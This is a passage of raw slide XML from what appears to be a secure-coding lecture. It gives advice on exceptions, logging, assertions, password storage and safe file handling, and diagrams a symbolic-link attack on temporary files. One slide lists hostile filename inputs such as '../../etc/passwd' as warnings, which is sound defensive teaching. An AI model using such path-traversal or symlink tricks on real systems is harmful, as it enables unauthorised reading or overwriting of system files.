            <a:pPr marL="266700" indent="-266700" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0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900" i="1" kern="0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// do something else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0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900" i="1" kern="0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// do yet something else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IOException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0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900" i="1" kern="0" dirty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// and yet something else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0" dirty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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1213643" y="3644107"/>
            <a:ext cx="500221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Coding – advice (cont.) </a:t>
            </a:r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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>when to log? depending on what information you need</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>logging is good – more data to debug, detect incidents etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(usually) better to log errors than print them out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>what to log: date and time, username, UID/GID, client IP, command-line arguments, program state etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use assertions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>test your assumptions about internal state of the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>assert circumference &gt; radius:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			”Wrong circle values!!!”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>available in C#, Java (since 1.4), Python, C (macros), </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>possible in any language (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>die unless ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>in Perl)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Coding – advice (cont.)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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protect passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> and secret information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>don’t hard-code it: hard to change, easy to disclose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>use external files instead (possibly encrypted)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>or certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>or simply ask user for the password</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Do you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>really have to optimize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>your code?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>computers are fast, performance is hardly ever a problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>it’s easy to introduce bugs while hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>how often (and how long) will your code run anyway? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>similar issue: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Don’t reject security features</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>because of “performance concerns”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Coding – advice (cont.)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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Be careful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(and suspicious) when handling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>if you want to create a file, give an error if it is already there (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>O_EXCL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> flag)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>when you create it, set file permissions</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(since you don’t know the umask)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>if you open a file to read data, don’t ask for write access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>check if the file you open is not a link with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lstat()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> function</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(before and after opening the file)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>use absolute pathnames (for both commands and files)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>be extra careful when filename comes from the user!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>C:\Progra~1\</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>../../etc/passwd</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>/dev/mouse</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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Safety vs. security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>
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Safety</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> is about protecting from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accidental</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> risks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>road safety</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>air travel safety</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> is about mitigating risks of dangers </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>caused by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>intentional, malicious actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>homeland security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>airport and aircraft security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>information and computer security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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Coding – advice (cont.)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z="1600" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Temporary file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>– or is it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>symbolic link attack: someone guesses the name of your temporary file, and creates a link from it to another file </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(i.e. /bin/bash) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>a problem of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>race condition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>hostile environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>good temporary file has unique name that is hard to guess</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>…and is accessible only to the application using it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmpfile()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (C/C++), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mktemp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> shell command or similar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>use directories not writable to everyone</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(i.e. /tmp/my_dir with 0700 file permissions, or ~/tmp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>if you run as root, don’t use /tmp at all!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Coding – advice (cont.)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z="1600" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Temporary file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>– or is it?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="79876" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="839788" y="4135438"/>
            <a:ext cx="7810500" cy="2005012"/>
            <a:chOff x="583" y="2621"/>
            <a:chExt cx="5424" cy="1392"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79884" name="Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="583" y="2621"/>
              <a:ext cx="5424" cy="1392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82945" tIns="41473" rIns="82945" bIns="41473" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
              <a:endParaRPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79885" name="Text Box 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1246" y="3437"/>
              <a:ext cx="1750" cy="2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82945" tIns="41473" rIns="82945" bIns="41473">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr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sz="2200">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/tmp/mytmpfile</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79886" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4088" y="3437"/>
              <a:ext cx="1166" cy="2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82945" tIns="41473" rIns="82945" bIns="41473">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr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sz="2200">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bin/bash</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79887" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1242" y="2669"/>
              <a:ext cx="2102" cy="2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82945" tIns="41473" rIns="82945" bIns="41473">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr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sz="2200">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/root/myscript.sh</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="79888" name="AutoShape 9"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="2871" y="2364"/>
              <a:ext cx="624" cy="1810"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd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79889" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2311" y="3091"/>
              <a:ext cx="807" cy="2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82945" tIns="41473" rIns="82945" bIns="41473">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr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>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>writes data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79890" name="Text Box 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3032" y="3677"/>
              <a:ext cx="983" cy="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82945" tIns="41473" rIns="82945" bIns="41473">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr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>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>symbolic link</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="79877" name="Group 12"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="839788" y="2060575"/>
            <a:ext cx="7810500" cy="1728788"/>
            <a:chOff x="583" y="1085"/>
            <a:chExt cx="5424" cy="1200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79879" name="Rectangle 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="583" y="1085"/>
              <a:ext cx="5424" cy="1200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82945" tIns="41473" rIns="82945" bIns="41473" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
              <a:endParaRPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79880" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1246" y="1902"/>
              <a:ext cx="1750" cy="2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82945" tIns="41473" rIns="82945" bIns="41473">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr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sz="2200">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/tmp/mytmpfile</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79881" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1242" y="1133"/>
              <a:ext cx="2102" cy="2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82945" tIns="41473" rIns="82945" bIns="41473">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr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sz="2200">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/root/myscript.sh</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
